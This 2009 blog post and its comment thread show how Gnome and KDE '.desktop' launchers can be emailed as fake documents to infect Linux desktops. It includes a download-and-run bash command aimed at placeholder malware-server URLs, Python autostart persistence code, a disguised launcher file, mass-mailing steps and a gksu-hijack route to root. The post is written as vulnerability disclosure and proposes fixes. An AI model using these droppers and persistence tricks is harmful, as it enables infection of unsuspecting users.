foobar on computers, software and the rest of the world


How to write a Linux virus in 5 easy steps

, posted: 11-Feb-2009 06:33

Note: I posted a follow up to summarise points and comments I received
as part of the overwhelming feedback to this article. Please read this follow-up
before (!) posting a comment, since some of what you might  want to say
may already have been addressed.

For the gist of it...

... just scroll down to the compact step-by-step guide. But if you like to get some of the background and related explanations then just read on.

 

The rumor of the bullet-proof Linux architecture

There is this rumor going around that Linux is virus free. It is said that the old-fashioned multi-user heritage of Linux (and other *nix OSs) prevents malware, since users are not normally running their programs in admin mode (as root user). We are reminded that execute bits are needed to run anything – contrary to Windows – and that execute bits aren't set on any attachments or files saved from emails or from a web-browser.

Therefore, we are told, the very architecture of Linux is so much more superior to Windows that it's just not possible to successfully spread malware. Of course – it is acknowledged – a low-level bug, a buffer overflow or other issue is exploitable. But nevertheless, users can't just catch a virus by email or downloading malware from the Internet, contrary to “those Windows users”. Linux will protect them from their own stupidity.

At least so the story goes. But sadly, that's not true. I will show how it is possible in a few easy steps to write a perfectly valid email borne virus for modern desktop Linux. I will do so not because I want to put down Linux. Quite the opposite: I like and support Linux, which is all I'm running at home and at work. I'm a big supporter of free and open software as readers of this blog will know. But if there are any security risks, even in my favorite OS or distribution then they will need to be discussed. Even more important: A false sense of security is worse than a lack of security. And unsubstantiated claims of superiority don't help in a reasonable discussion either.

 

Some notes before we get started

Update: There has been a lot of feedback about me using the term 'virus' not correctly here. That I should talk about a 'trojan horse' instead. There is some disagreement on whether a virus requires user interaction or not, and whether we would be talking about a worm if we are talking about malware that can spread without user interaction. There is also some disagreement on whether a malware that spreads itself via email can be considered a virus or not. There are many sources that would call such a thing a virus (an 'email virus') and others which would be more exacting in their definition. Let this article not be about that discussion. I'm calling this malware here a 'virus', even though it does require user interaction and even though I don't provide actual code for how to spread itself (that code is only provided as very high-level pseudo-code).

I should point out: The vulnerabilities we will be taking advantage of are 'features' of the most popular modern Linux desktop environments, Gnome and KDE. The actual core of Linux itself does not have any of these vulnerabilities. A Linux (or any other *nix) system without running Gnome or KDE will not exhibit any of these problems, which is one of the huge advantages of properly separating the core OS from other applications such as the desktop environment.

On the flip side, if you run those desktop environments on other OSs (maybe on FreeBSD, for example) then you possibly have to deal with the same vulnerabilities. A more accurate title for this email therefore might have been: How to write a Gnome/KDE virus in 5 easy steps. But since Gnome and KDE are predominantly used under Linux, I feel that a virus based on those vulnerabilities would impact Linux users the most. Thus, the chosen title remains valid.

The text of this article here will explain to you which steps need to be taken to infect a desktop and how to install your malware and will provide background information on why those steps are necessary and why they actually work. After the longer explanation there is a more compact step-by-step summary towards the end. Even though there are some code snippets, the article will not provide the code for a ready-made piece of malware.

Several days ago I sent a message to the security teams at Ubuntu and Fedora, asking if they would like to take a look at this before I publish. The Ubuntu team hasn't responded yet, but the Fedora team told me that this is “well-known and expected behavior” and that they have no problem with me publishing this. Well-known and expected? Really? But ok then, here we go.


Getting users to open attachments: Check out these nude shots!

If you are now looking forward to some new, fantangled exploit or some extra clever hackery, I will have to utterly disappoint you. What I'm showing here is merely an example of how the old-school social engineering "viruses" (they hardly deserve that name) which have been bothering the Windows world for such a long time can be made to run on Linux, or any other *nix OS with a modern desktop environment.

The premise of this type of 'virus' is simple: Get a user to run an executable attachment you sent them via email. This is completely low-tech. No black magic here. I'm not taking advantage of a new exploit in any way. To make it work in Linux I'm just using the 'features' of modern desktop environments in somewhat unintended ways, I guess. After all, it's all “well-known and expected”.

Doing this under Windows is straight forward. You create your malware as an EXE file, attach it to an email which says something like: "Whoa, check out these nude shots of ....!". The hapless user double-clicks on the attachment, which Windows – in the absence of some decent anti-virus software – will obediently execute. Before you know it the malware is installed and the system is owned. The execution of .EXE files from within email clients under Windows is of course also “well-known and expected”.

You think this is not possible under Linux? Of course it is. It just requires one or two more steps. However, there is nothing fundamental about the architecture of Linux that prevents user stupidity or ignorance, which is of course the main ingredient in any attack vector like this.

There is just one small stumbling block, which needs to be overcome. Well, two, actually.

Firstly, most email clients for Linux will not execute attachments. They might try to open them if they know the extension as an indication for a document or media type (.pdf or other documents for example). But that's about it. So, let's say you have written your malware as a nice Python script. In that case, your script may have the .py ending, but the email client is still unlikely to invoke the Python interpreter for you. You would have to go out of your way to configure your system to do that, and who would do something like this?

No, we need a slightly different approach. Something that always gets executed when clicked on. And here then is one more step that needs to be taken by the user, which might reduce the success rate of this attack vector a little. The user has to first save the attachment and then double click on it. Because while the email client typically cannot run an executable file, the desktop environment very well can as we will see. So, the email will have to read something like:

Whoa, check out these nude shots of...!

(if the attachment doesn't want to open just save it to your desktop and open it...)

That would sound suspicious to most of us, but 'most' is not 'all' and user stupidity is everywhere. Besides, many users of web-based email clients are used to the save-first routine anyway.


Do not underestimate user ignorance – even on Linux

You might argue that most Linux users tend to be a bit more aware of what they are doing. They usually had to make a conscious choice about their OS and therefore tend to not be your typical non-technical user. But that is changing! Some netbooks are shipped with Linux as default. In that case users may not have consciously chosen Linux and thus can be just as blissfully ignorant as those Windows users who click on email attachments. Also, some large organizations are thinking about mass Linux desktop roll-outs. Various cities and governments around the world, for example. The users there are not technical either and are just as likely to click on attachments.

Furthermore, the trouble free times of the past have given Linux users another false sense of security. We are so used to the constant mantra of "Linux is so secure, you don't even need anti-virus software!" that we probably really don't have any anti-virus software to catch us when we are about to do something dumb.

Ok, back to the technicalities. Most email clients save attachments to the desktop of the user or in the user's download directory where the user will then go look for it. So, if the user doesn't endlessly examine the attachment but simply clicks the 'save' button in the email client then that usually does the trick: The attachment will be right there in the face of the user. In fact, I noticed that for some reason my Evolution email client sometimes has issues opening even normal documents as attachments directly. For example, someone sends me an .odt file but Evolution sometimes doesn't start OpenOffice for me. So, whenever this doesn't work, I just save and open it then. I'm already trained to do this kind of stuff! I'm probably not the only one.

 

Getting attachments to execute

We said earlier that attachments are not normally run when they are stored as files. There is no standard file extension that indicates that a file should be executed when clicked, as there is under Windows. Instead - and this is the second big hurdle we need to overcome - for the file to be executable under Linux (or any other *nix OS), the execute flag would have to be set in the permissions of the file. This is something that Windows doesn't have, and which is often seen as one of the reasons why infecting a Windows PC can be so easy, and why it should be close to impossible on *nix systems. When you save an email attachment under Linux, the execute flag is normally NOT set and thus, the file can't be executed just by clicking on it. So, no luck?

Not so fast. Modern desktop environments, such as Gnome and KDE, conveniently offer a nice "workaround" called 'launchers'. Those are small files that describe how something should be started. Just a few lines that specify the name, the icon that should be displayed and the actual command to execute. Conveniently, the syntax of those launcher files is the same for Gnome and KDE. And those launchers don't have to have any execute permissions set on them! Desktop environments treat those files as a special case, so when you click on them Gnome or KDE will happily execute the command that was specified within the launcher description and without the need for the execute bit to be set on the launcher itself. Now we are getting somewhere!

A problem we are now facing is that the command that can be executed by a launcher is really just one line and just one command. It's a bit tough to install malware with just a single command. Or is it? How about this here:

% bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"

What does this single command do? It starts bash, a command shell (part of any default install), and passes a string argument with two simple commands to it, which bash will then execute. The first command (curl) downloads a script from some malware server you have to set up and then stores the script in a place where we know that we can write to (the /tmp directory). Note that on some systems (Ubuntu, for example) you don't have curl, but a similar command called wget. That complicates the actual command line here a little bit, but it's not an insurmountable problem, as shown in the step-by-step guide further down. The second command (the call to the Python interpreter) then executes that freshly downloaded script (a Python script in this example). Both Python and curl (or wget) are typically part of the default install of most Linux distros.

If we put this into the Exec line of the launcher definition then a simple click on that launcher will lead to the execution of a single command, which in turn executes two commands, which then lead to the download and execution of an arbitrary complex script. All without the execute bit being set anywhere.


You don't need to be root to 0wn someone

None of that so far required root privileges. And our script now can do whatever it wishes to do within the confines of the user account. Confined it may be, but that doesn't prevent the possibility of significant damage to be done.

For example, it can start to pilfer through the user's address book to harvest email addresses, send them off to our malware server, start sending spam email or it can spread itself by email. It can install a Firefox extension that captures passwords as the user types them. It may start to share the user's desktop via VNC without the user's knowledge. It can start a background daemon that pops up ads. Linux adware!

All of this is executed as a normal user process. Truly, on a desktop system that is normally just used by a single user owning that user account is pretty much equivalent to owning root, as far as doing damage is concerned: All the action you are interested in takes place in the user account anyway.

But maybe you really want to have root for your malware? Well, there's a way to do that as well, but this is not guaranteed to work in all cases and is frankly not necessary to successfully infect a machine. So, to not distract from the important points of this article here, I have a discussion of that in an appendix.


Autostart after reboot

But surely, even if the user is not able to find the running process and kill it then just a simple reboot will stop that nonsense right? Surely, root privileges are needed in order to force our malware to be automatically launched in case of a system restart, right?

Not so. Users do not need root privileges in order to configure certain applications for autolaunch when they are logging into their own user sessions. That is because they are only making changes to their own session and user account, not the underlying system settings. Again, any apps started as part of the user session will only run at the user's privilege level, but as we have seen, this is not a major problem. Lots of interesting things can be done even then.

So, how do we get ourselves to be auto started when the user logs in? There are a number of scripts that get executed when you start a shell, but the user that's likely to click on a suspicious attachment is not likely to start a shell very often if at all. Fortunately, the modern desktop environments have their own set of commands which they are autostarting on login. In the case of Gnome, take a look at what you find in ~/.config/autostart (this directory may not exist yet, if you have not configured any apps for autostart). That's right! More launchers! Those are run every time the user logs into Gnome. For KDE it's even simpler: Just link to your executable from within the ~/.kde/Autostart directory.

Our malware then only needs to create an appropriate entry in those directories and it will start to run whenever the user logs in!

And that's all there is to it. I leave the writing of the actual malware script as an exercise to the reader.


Compact step-by-step guide

Ok, so here is the summary then, which also fills in a few more specific details:

  1. Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.

  2. Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.

    For example, to create the shortcut for KDE, all you need to write in Python is:

       import os
       uname = os.getlogin()
       drop_dir = “/home/%s/.kde/Autostart” % uname)
       os.makedirs(drop_dir)
       os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")


    For Gnome the Python script instead needs to write a launcher into the proper directory:

       import os
       relauncher_str = """
       [Desktop Entry]
       Type=Application
       Name=Malware
       Exec=python .local/.hidden/s.py
       Icon=system-run
       """
       uname = os.getlogin()
       drop_dir = “/home/%s/.config/autostart” % uname
       os.makedirs(drop_dir)
       f = open(drop_dir+”/Malware.desktop”, “w”)
       f.write(relauncher_str)
       f.close()


    Writing these autostart entries is probably some of the first action that your malware should perform.

  3. Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this:

       [Desktop Entry]
       Type=Application
       Name=some_text.odt
       Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
                                DROP=~/.local/.hidden ;
      
                            mkdir -p $DROP;
      
                            if [ -e /usr/bin/wget ] ;
      
                            then wget $URL -O $DROP/s.py ;
      
                            else curl $URL -o $DROP/s.py ; fi;
      
                            python $DROP/s.py'
       
    Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

    Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and chose one of the appropriate standard image icons.

    The Exec line is a bit longer now, because we have to account for the possibility that either wget is installed or curl. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot.

    Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.

  4. Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as 'some_text.odt' on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.

  5. Send this email out to as many email addresses as you can get a hold of.

Voila! A Linux virus in 5 simple steps. Every user that saves and opens the attachment you have sent them will get themselves infected with the malware script of your choice, which is then also restarted whenever the user logs in again.

That was easy, wasn't it?


Solutions for the problem

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken serious.

A step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop a user can't just click on it and start it if the execute bit is not set.

Thirdly, stop perpetuating the myth that malware and viruses are only a problem for Windows. Linux is – in principle – vulnerable as well, of course. Even though users don't operate with root privileges, if they inadvertently execute a bit of malware then a lot of damage and autostart installation can still be done. The simple fact that an executed attachment won't run as root is NOT a useful protection against much of anything, as we have seen. The fact that attachments are not saved with the execute bit is NOT a sufficient protection either, since modern desktop environments allow you to neatly maneuver around that.

Right now the limited market share of Linux on the desktop offers some protection. The overall better security architecture offers some more protection. But none of that is fool-proof. And with larger Linux deployments in interesting locations – such as government organizations – those installations also become interesting targets for malware authors.


Thunar?

Interestingly, the Thunar file manager under xfce (Xubuntu 8.10) is doing something that Gnome's and KDE's file managers are not doing: It will flag the desktop launcher file as potential malware and thus prevent execution via a simple click. This works whether the attachment was saved from within Thunderbird or from within a web-based email system, such as Yahoo Mail. Does anyone know what Thunar specifically does here to come up with the 'malware' conclusion?

However, I confirmed that it works with fresh, stock Ubuntu 8.10, Kubuntu 8.10 and Fedora 10 installs. Since this is mostly based on the functionality of Gnome and KDE, I assume that most distributions that utilize those desktops are vulnerable as well.


Bootnote

Some time ago there was a challenge issued to write a virus that would be able to infect a desktop Linux system. The original challenge contained two important caveats, though: Firstly, it should be able to infect the machine of the person who wrote the challenge. Nothing further is known about that machine. For example, we don't know which desktop he was running. Secondly, the virus should be able to write a file into the /etc directory, to which normally only root has access.

I would content that a Linux virus can be called successful if it is able to infect standard installs of some of the most popular distros. I know that the approach I am suggesting will be able to infect a standard install of Ubuntu, Kubuntu and Fedora, for example.

Secondly, as outlined above, getting root privileges is not necessary to successfully infect a Linux computer. Well, it's more the account of the user that is infected, isn't it? However, if we are talking about desktop computers then for the most part there is only going to be a single user. The distinction between infecting the system (as root) or the user account (as the user) is entirely academic at best. Such an infection is in effect the same as saying 'the machine is infected'. After all, the user is mostly logged in and the malware will run whenever that is the case. Anyway, I contacted the author of this challenge and explained the situation to him. He insists on the original rules laid out in his challenge, though. Fair enough, it's his challenge and therefore his rules.

So, what if you really want root then?

 

Appendix: Getting root

Getting root privileges is always considered to be a bit of the holy-grail of compromising another machine. As we have seen, not having it isn't really preventing you from having yourself a good time with a virus, though. But just for completeness' sake, let me outline a way for your malware to get root. There might be other ways, but this is what I could come up with for now.

You see, even normal desktop Linux users will occasionally do stuff as root. In the case of Ubuntu, for example, you will use 'sudo' (or the graphical equivalent gksu) from time to time in order to perform system administration. Maybe to administer users, change the date and time or to install new software. Many items in the System -> Administration menu will prompt you for your password for that reason. By default, the user of a Ubuntu desktop system tends to be in the 'admin' group, which in turn is mentioned in /etc/sudoers. Thus, by providing your own password you can perform tasks with root privileges.

So, now how can we take advantage of this? It turns out that the menu items for your Gnome desktop are individually configured somewhere. Maybe we can hack that so that instead of synaptic (the graphical package manager) or any other utility that runs under sudo or gksu) our nice malware is started instead? After the user has provided their password for sudo? But as it turns out, the menu items are defined in a place to which only root has write access. Take a look at /usr/share/applications. In there you find – again – a large number of launcher files. These are defining the various menu items. For example, take a look at synaptic.desktop. You can see there the following line:

Exec=gksu /usr/sbin/synaptic


Yes, so if we could just go ahead and edit that, right? If our malware could go and change that to:

Exec=gksu python .local/.hidden/s.py /usr/sbin/synaptic

That would execute our malware with root privileges. Note that we quietly passed the original name of the executable (/usr/sbin/synaptic) to our malware, so that it can start synaptic after it is done permanently giving itself root privileges or doing whatever it wants to do as root. That way the user won't become suspicious.

But, alas, we can't edit that file. Out of luck again? Fortunately, no. Gnome is kind enough to see if we might have a local definition of one of those desktop files, which should override the system-wide settings. Those go into ~/.local/share/applications. So, you can simply copy the synaptic.desktop file from /usr/share/applications to ~/.local/share/applications and perform the changes you want on it. Then you just have to sit back and wait for the next time the user starts synaptic and you are in business.

Of course, you don't have to limit yourself to synaptic. To have a better chance of being executed with root privileges any of the apps in the Administration menu that require gksu are fair game. And frankly, you can probably make similar changes and introduce gksu to many of the menu items in System -> Preferences. As a Ubuntu user you are used to give your password to gksu from time to time. If the user doesn't pay attention, they won't even notice that they just were prompted for their password for a utility that never asked for the password before.

And for those users that like to use the shell: Well, in that case the malware can simply mess with your path definition and place a 'tuned' version of the 'sudo' command in your path, which gets executed whenever you type 'sudo'.

As you can see this is not guaranteed to give you root (if the user never uses those programs), but there's a good chance that you will get it eventually if you are patient.

Update, Feb 12, 2009: It would really have surprised me if I were the first person to think of this vulnerability. Looking around a little on the Internet, I couldn't find any references to this, though. Well, the editor of LWN.net did a better job. As he points out here, there has been discussion about the vulnerabilities introduced by .desktop files back in 2006 already.

 

Note: I posted a follow up to summarise points and comments I received
as part of the overwhelming feedback to this article. Please read this follow-up
before (!) posting a comment, since some of what you might  want to say
may already have been addressed.

 



Other related posts:
Munich already saved millions by switching to Linux
Smooth sailing with the Karmic Koala
A Linux distro for Cuba








Comment by EvilPixieMan, on 11-Feb-2009 08:05

"Therefore, we are told, ... that it's just not possible to successfully spread malware."

"But nevertheless, users can't just catch a virus by email or downloading malware from the Internet, contrary to "those Windows users". Linux will protect them from their own stupidity."

What rubbish - "We are told" by whom? You conveniently invent an imaginary rumour, and are then able to debunk it. Bravo for you!

I can see that you are trying to educate users that just by running Linux they shouldn't think they are immune to malware. Well if you're trying to educate, its not good practice to base the lesson on misinformation -

1. I don't know where you got the rumor that Linux is free from trojans.

2. Be clear about the difference between a trojan and a virus.

Linux is has a better rep on the virus front, but _ANY_ modern user-oriented OS will run an application that a user requests it to run, so ALL are to some extent susceptible to trojans to some extent (It is actually more a function of the email client behaviour, and how "easy" it makes it to execute code). That is the thrust of your article, you didn't need to waffle on for so long to prove that point.


Comment by herghost, on 11-Feb-2009 08:26

Excellent, eye-opening article.

Alas, I am (was?) one of the people who fell for the "linux is virus-free" mantra. And this is the key point, and you make it very well: if every new user is indoctrinated to believe what is effectively only technicaly true as soon as they join the community then the potential for being exploited is massive.

Someone needs to take a long hard look at whether these "convenience factors" are causing more harm than good.


Author's note by foobar, on 11-Feb-2009 08:38

@herghost: Thank you for the feedback. Yes, the convenience factors are the problem here. They could easily be circumvented by requiring execute bits on the launchers. You are right: New users will often think that under Linux they don't have a virus problem, and that ... can be a problem.


Author's note by foobar, on 11-Feb-2009 08:51

@EvilPixieMan: It's my blog, so I "waffle on" for as long as I want. If you don't like it ... you know what you can do.

You don't know where I get the rumour that Linux is malware free? There are many people claiming that viruses and malware are not much of an issue on Linux. There are also other people pointing out that it is of course not 'free' of those things, but clearly the prevailing opinion is that email borne malware is not much of an issue of Linux.

Read the opening paragraph here: http://en.wikipedia.org/wiki/Linux_malware

Also, read this for the typical take on this: http://linuxmafia.com/~rick/skoll/anti-virus.php

And yet another one: http://linuxmafia.com/~rick/faq/index.php?page=virus#virus

Or point three in this one: http://pcsplace.com/linux/10-reasons-to-switch-over-to-linux-from-windows/

That's just a small sample.

As far as the virus/trojan differentiation is concerned: I am aware of that. Having been in the security industry for some number of years, I also know that the press has hopelessly muddled that distinction. While there used to be a differentiation based on whether the malware required human interaction or not, whether it was taking advantage of a vulnerability or user-stupidity, etc. ... all those useful distinctions have been lost or messed up. Thus, I just stuck with the nowadays 'generic' name: Virus. Note that I wrote "they hardly deserve that name".


Comment by freitasm, on 11-Feb-2009 08:53

Hmmm. Like the good old .PIF files then?


Author's note by foobar, on 11-Feb-2009 08:57

@freitasm: Yes, a little bit like a PIF file, I guess.


Comment by freitasm, on 11-Feb-2009 09:00

@EvilPixieMan it is the "sell line" of every Linux defender I know. When I tell someone to update their Windows systems, the first thing I hear is "you wouldn't need this with Linux". It's too early in the morning to go with more examples, but in general everyone I know using Linux will say it's a safe OS, when we all know there isn't such a thing as a 100% safe software.

Example of this is when Microsoft issues the monthly updates. I tell people "I've updated [x] number of machines at home and servers" and the immediate response is "we don't have to worry about this with Linux". Then I point to a list of security vulnerabilities from the vendors and they change subject.

Too bad people want to be blind...


Comment by David F. Skoll, on 11-Feb-2009 09:05

Hello,

I wrote the original challenge. This is an interesting attack, and it reaffirms my decision not to use either KDE nor GNOME.

Also, is it really true that most GNOME and KDE email clients save to your Desktop directory? (I don't know; I don't use such clients.)

There are also a few more hoops to run through than for the average Windows virus, plus the little matter of getting a useful local root exploit, so I think Linux is still relatively safe. Nevertheless, this does serve as a cautionary note for "Desktop Environment" developers and users.


Author's note by foobar, on 11-Feb-2009 09:12

@freitasm: You are right: The security of Linux is always mentioned as a good reason to switch. And in fact, I still agree with that argument. I believe that Linux itself is definitely much more secure (note how these vulnerabilities are in Gnome and KDE, not in Linux itself). There is noticably less malware out for Linux. There are several reasons for that:

 * Linux as the core OS is more secure.
 * There is much more diversity in the potentially more vulnerable desktop environments.
 * Linux has a smaller market share.

The second point is often overlooked: Whatever works on one version of Linux doesn't work on the other. Linux has a small market share, but those who run Gnome and KDE have an even smaller percentage of that, and so on. And servers, which don't run a desktop component, are very secure indeed.

Security vulnerabilities (buffer overflow, this or that) always will exist, Windows, Linux, FreeBSD, OS X, it doesn't matter. Often, the published vulnerability list for Linux includes those of the many available or bundled apps, while those for Windows only include those of the core OS, that should also be taken into account. Linux security is much better than it appears in that respect.

I'm still of the opinion that a switch to Linux will greatly enhance everyone's security and reduce the amount of concerns that they have to have about malware. However, as Linux users we cannot be complacent or rest on our laurels. Linux security is much better than that of Windows, we just have to make sure it stays that way.


Author's note by foobar, on 11-Feb-2009 09:22

@David F. Skoll: Hello David! Nice of you to stop by. :-)

Whether most clients save to the desktop is something I am actually not as sure about. I know my do, they always do, but then: I possibly configured them to do that once and I just carried that config file with me. However, it doesn't make a difference for the effectiveness of this: Even if the client saves it spefically into a 'Downloads' directory (or some such place): If the user maneuvers to that directorory using the Gnome or KDE file managers, the desktop environment will treat those launcher files the same way as if they were stored on the desktop itself. The user sees them without the '.desktop' extension and clicking it will launch the application as described in the 'Exec' line.

I know you like your root access, but honestly: I think it is overrated! Much damage can be done without it. But while not guaranteed to succeed 100% of the time, what I proposed in the appendix on how to get root should work many times.


Comment by notavir, on 11-Feb-2009 09:42

this is not a virus, for something to be classified as a virus it need to be self-replicating to other machines and without user interaction. What you have created here is a mallicous script, which relys on the users stupidnes, aka a trojan horse.


Comment by mjcpk, on 11-Feb-2009 09:59

I think in many ways the root idea is a hangover from old school viruses. Before people had worked out ways to make serious money from malware a virus was often created for fun and mischief. As a result we had viruses that messed with boot sectors, formatted hard drives and generally messed with the OS.

Nowadays, as you point out, there are lots of more useful things you can do without root. Root is important on servers ( not least so that you can cover your tracks ) but in a desktop environment you can do more than enough harm.


Comment by Bryan Short, on 11-Feb-2009 10:02

Interesting article and I agree for the most part. While Linux is inherently more secure, it is not immune to virus/malware.

One issue that you weakly touch on but fail to really address is the persistence issue. Sure there can be a self-executing script added to the $Autostart dirs, but again it is very easy to spot changes here. Writing virus protection software to monitor any malware adding entries to $Autostart would not require too much time or effort. Thereby killing any persistence issues. Granted, no such malware detection exists currently.

The issue really is, if you in Windows stumble upon a malware containing site, you are infected without any user interaction and probably in a way that is very difficult to detect and clean. In Linux it is not the case due to the executable issue. Your root exploit is interesting and worrying. It worries me that in the future we will be met with attacks using Flashplayer or java which could then implement your kdsu/sudo attack. That will be difficult to detect for a normal/average user.

Nevertheless, I enjoyed your article.


Author's note by foobar, on 11-Feb-2009 10:11

@notavir: Thank you for your comment. Yes, the old-school definition of a virus is specific, however, as I pointed out in the reply to another comment:

As far as the virus/trojan differentiation is concerned: I am aware of that. Having been in the security industry for some number of years, I also know that the press has hopelessly muddled that distinction. While there used to be a differentiation based on whether the malware required human interaction or not, whether it was taking advantage of a vulnerability or user-stupidity, etc. ... all those useful distinctions have been lost or messed up. Thus, I just stuck with the nowadays 'generic' name: Virus. Note that I wrote "they hardly deserve that name".

And a commenter on reddit said:

Actual viruses went out with the floppy. They were the first common form of malware on PCs, so the defensive software was named for them, but executable infection is such an inefficient transmission vector that absolutely no one bothers anymore. The word "virus" is now nothing more than a more familiar, less clumsy synonym for "malware," encompassing worms, trojans, spyware, and those irritating-but-unnamed things that sneak in through browser exploits.

I had mentioned in the article that I am describing how to write the code that infects and installs autostart. I also mention (without giving code): ...it can start to pilfer through the user's address book to harvest email addresses, send them off to our malware server, start sending spam email or it can spread itself by email.


Comment by freddie, on 11-Feb-2009 11:29

ok...so now I'm back(had to register before being able to ask a question :) so since its easy to create a virus in ubuntu, how can it be protected other than running clamtk and not clicking on "nude chicks" thru an email? I just installed ubuntu 8.10 yesterday and when trying to compare it to vista, I'll go ubuntu any day! But the command line is still mostly greek to me.

thanks
freddie


Author's note by foobar, on 11-Feb-2009 12:13

@freddie: As long as you are running Gnome or KDE you will have to be careful with saving attachments and then clicking on them. If you click on them inside of the email client you are still safe for now. Also, take a look at the actual name of the attachment in your email client BEFORE you save it to disk. If it ends with '.desktop' then you have to be suspicious.

Frankly, there is currently not much of a threat here, but it's just a good habit to check the name of the attachment before saving.


Comment by nzsouthernman, on 11-Feb-2009 12:58

Well put & well written dissertation. Keep it up.


Comment by Jonas, on 11-Feb-2009 14:22

"If the user maneuvers to that directorory using the Gnome or KDE file managers, the desktop environment will treat those launcher files the same way as if they were stored on the desktop itself. The user sees them without the '.desktop' extension and clicking it will launch the application as described in the 'Exec' line."

Not necessarily. I don't have access to a Gnome-based or KDE3.x system right now so can't verify how it works there, but your approach would hit a snag on a KDE4 system. A small snag to be sure, but still.

The .desktop ending is only hidden when the file is viewed at the desktop-level. If I were to have a .desktop file in ~/Desktop, and entered that directory using the filemanager I would still see the ending of the file. Moreover, if the "preview" mode is turned on it would look like a normal text-file instead of whatever the icon-part tells it to look like.

Still, probably wouldn't stop a user intent on being fooled...(especially since most non-technical users would know what a .desktop file is in the first place) and yes, I agree desktop files should be required to have the execute flag set.


Comment by ropers, on 11-Feb-2009 15:18

(0) Minor typos: The package manager is called synaptic, not synaptics (as you spelled it some of the time above). You may want to fix that.

(1) What you wrote about getting root above relies on messing with /usr/share/applications/synaptic.desktop. That constitutes a chicken and egg problem, because:

$ touch /usr/share/applications/synaptic.desktop

touch: cannot touch `/usr/share/applications/synaptic.desktop': Permission denied

However, all is not lost. At least in Ubuntu, users appear to have a ~/.local/share/applications/ directory, possibly opening the door to something like this:

sed -i 's:/usr/bin/update-manager:echo pwned!|wall:g' ~/.local/share/applications/update-manager.desktop

I suspect that this folder, as .desktop files themselves may be Freedesktop.org standards (cf. http://en.wikipedia.org/wiki/Freedesktop). (Freedesktop.org may also be the right guys to talk to in order to fix this correctly by requiring execute permissions for .desktop files, as you suggested.)

Also, I wonder if it may still be possible to tell the system to just execute a custom program in lieu of a system binary. If so, then one could go straight for the jugular and try to convince the system to execute an own script instead of gksu/gksudo by defining an alias (aliases take precedence, as "which" can verify). If one could source whatever alias definitions one has changed so that they also apply to all of the user's already currently running sessions/terminals, then I suspect that the next time gksu/gksudo is called, the attacker should be in business. The fact that many systems such as Ubuntu quite regularly run their update manager and prompt the user to update, and call gksudo in the course of such an update installation may even work in the attacker's favour.


Comment by David F. Skoll, on 11-Feb-2009 16:00

*sigh* I've confirmed that Thunar (the XFCE file manager) hides the .desktop extension and runs the desktop command by default when you click on the icon.

Ditto Nautilus, the GNOME file browser.

Konqueror doesn't hide the .desktop extension, but it does execute the command.

Congratulations, "Integrated Desktop" developers. You have just managed to recreate one of the worst design flaws of Windows: The encoding of file metadata ("executableness") in the file name (".desktop")

Well, it's a good thing I'm a grumpy old UNIX type who likes X because I can have lots of terminals open. No "file managers" or "desktop environments" for me, thanks.


Author's note by foobar, on 11-Feb-2009 16:26

@ropers:Actually, I know that you can't write to /usr/share/applications/. However, as I pointed out in my article, ~/.local/share/applications is exactly the place where you would write your own definition in order to overwrite the system default.

Maybe you missed that? But I did mention that in the article already.


Author's note by foobar, on 11-Feb-2009 16:28

@David F. Skoll: Yes, Thunar hides the .desktop extension as well. However, if you have saved this file (I tried from within Thunderbird as well as Firefox) Thunar somehow figures out that this is not quite legit. In that respect it manages to protect users better than the Gnome and KDE file managers.

However, I haven't tried creating the launcher file by hand. Maybe if manually created Thunar doesn't quite catch the problem?


Comment by Michael H., on 11-Feb-2009 16:56

I really hate the "Linux has a lower market share" myth.

Don't forget how many servers run Linux and how important those services are: Wikipedia, Facebook, Google, NYSE, TSX, Chrysler, IBM (develops it), Intel (develops for it and uses it internally), etc.

Don't you think if a virus was able to successfully propagate to these servers there would be more damage done than on some user's PC?


Comment by friends of the one law, on 11-Feb-2009 17:46

An outstanding article of high merit indeed.

One point, however, invites closer scrutiny:

"However, there is nothing fundamental about the architecture of Linux that prevents user stupidity or ignorance..."

There exists one aspect in which linux passively discriminates against 'user stupidity or ignorance'. [This doesn't 'prevent' user deficient characteristics - it merely fences out those less competent from using linux to begin with.]

The installation and/or maintenance of a basic linux desktop requires a level of knowledge _and_ intellect somewhat more developed than that required for a basic Micro$oft product.

